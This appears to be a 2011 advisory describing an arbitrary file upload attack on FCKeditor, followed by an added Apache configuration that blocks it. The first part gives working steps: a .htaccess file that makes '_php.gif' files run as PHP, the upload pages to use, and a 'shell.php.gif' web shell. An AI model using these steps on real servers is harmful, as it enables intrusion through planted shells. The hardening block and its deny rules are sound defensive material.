FCKeditor upload vulnerability in all PHP versions
Author: anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this .htaccess with FCKeditor.
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available from the server.
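The technique above needs two things from the web server: an uploaded .htaccess that is honoured inside the upload directory, and a handler mapping that makes the renamed *_php.gif file execute as PHP. The following Apache configuration fragment closes both. It is an added example written for this page, not configuration from sinesafe.cn or the FCKeditor project; the directory path /var/www/html/userfiles is an assumed placeholder for the FCKeditor upload root, and the Require syntax is Apache 2.4 (the 2.2 equivalent is noted in comments).

```apache
# Added example (not from the original advisory): hardened vhost fragment
# for the FCKeditor upload root. The path below is an assumed placeholder.
<Directory "/var/www/html/userfiles">
    # Steps 1-2 of the advisory depend on an uploaded .htaccess being read.
    # AllowOverride None makes Apache ignore .htaccess files in this tree,
    # so a user-supplied SetHandler line has no effect.
    AllowOverride None

    # Never execute server-side code from user-supplied files, whatever
    # the name. With mod_php, switch the engine off for this directory.
    # (Module name is mod_php7.c on PHP 7; under php-fpm make sure no
    # ProxyPassMatch/SetHandler covers this path instead.)
    <IfModule mod_php.c>
        php_admin_flag engine off
    </IfModule>

    # Drop any inherited handler/type mappings so a file such as
    # shell_php.gif or shell.php.gif is served as static bytes at most.
    RemoveHandler .php .phtml .php3 .php5 .phar
    RemoveType .php .phtml .php3 .php5 .phar
    Options -ExecCGI -Includes

    # Refuse to serve names that contain a PHP extension anywhere
    # (double extensions like x.php.gif) or the "_php." rename pattern.
    # Apache 2.2: replace "Require all denied" with
    #   Order deny,allow
    #   Deny from all
    <FilesMatch "(?i)(\.ph(p[0-9]?|tml|ar)|_ph(p[0-9]?|tml|ar)\.)">
        Require all denied
    </FilesMatch>

    # Refuse dotfiles outright, so even a stray .htaccess is never served.
    <FilesMatch "^\.">
        Require all denied
    </FilesMatch>

    # Stop browsers from sniffing an "image" into HTML/script.
    <IfModule mod_headers.c>
        Header set X-Content-Type-Options "nosniff"
    </IfModule>
</Directory>
```

AllowOverride None is the single line that matters most: without it, any writable directory that Apache serves can be reconfigured by whoever can create a file there. The remaining directives are defence in depth for servers where the global configuration has already mapped PHP handlers above the upload tree.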